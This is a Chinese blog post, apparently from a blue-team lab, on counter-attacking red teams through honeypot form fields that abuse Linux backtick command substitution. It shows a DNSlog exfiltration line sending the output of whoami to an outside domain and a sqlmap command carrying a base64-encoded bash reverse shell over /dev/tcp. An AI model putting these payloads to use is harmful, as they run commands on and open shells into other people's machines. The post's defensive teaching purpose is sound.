查看原文
其他

常见安全工具蜜罐反制上线[睁眼瞎版]

ChinaRan404 知攻善防实验室 2023-11-27

应用场景:

  1. 攻击队精神疲惫,掉以轻心,使用自动化漏扫并无对URL以及数据包进行过滤。

  2. 攻击队为技术欠缺的队伍,了解知识面比较少。

  3. 该利用方式,本质上与各种工具并无关系,而是使用了终端的特性进行反制。


利用场景:

Linux反引号特性

反引号这个字符所对应的键一般位于键盘的左上角,不要将其同单引号混淆。反引号括起来的字符串被shell解释为命令行,在执行时,shell首先执行该命令行,并以它的标准输出结果取代整个反引号(包括两个反引号)部分。

所以,终端执行流程

反引号->往前推的命令

例如:ping `ls`

┌──(root㉿kali)-[/]└─# echo `ping`ping: usage error: 需要目标地址

DNSlog

┌──(root㉿kali)-[/]└─# ping `whoami`.swwipozkje.dgrh3.cn.PING root.swwipozkje.dgrh3.cn (139.198.11.227) 56(84) bytes of data.64 bytes from 139.198.11.227 (139.198.11.227): icmp_seq=1 ttl=128 time=30.4 ms^C64 bytes from 139.198.11.227: icmp_seq=2 ttl=128 time=22.5 ms
--- root.swwipozkje.dgrh3.cn ping statistics ---2 packets transmitted, 2 received, 0% packet loss, time 2139msrtt min/avg/max/mdev = 22.476/26.419/30.363/3.943 ms

可以看到反引号里面的内容,被终端所执行。

那么,利用此特性,我们可以进行什么操作呢?

NC进行反弹上线

┌──(chinaran㉿kali)-[~]└─$ nc -lp 6618

监听本地6618端口

使用sqlmap进行模拟测试

sqlmap -u 'http://baidu.com/' --data "name=asho&id=45273434&query=shell`echo c2ggLWkgPiYgL2Rldi90Y3AvMTI3LjAuMC4xLzY2MTggMD4mMQ== | base64 -d|bash -i`&port=6379"

其中echo后面是经过base64编码后的shell执行内容,解码后为以下内容:

sh -i >& /dev/tcp/127.0.0.1/6618 0>&1

执行,查看nc,发现shll已经反弹

构造蜜罐,实现仿真效果

在真实环境中,我们可以在表单中添加很多杂七杂八垃圾数据,某些攻击队在心浮气躁的环境下会直接放进工具里面跑。

例如:

怎么搭建蜜罐并且仿真爬取网页,请看往期文章

总结:‘打战的时候长眼睛,别瞎点,使用带高亮的终端。’

[蓝队知识]如何部署自定义蜜罐页面

本蜜罐环境下载地址:后台回复'1104'

继续滑动看下一个

您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存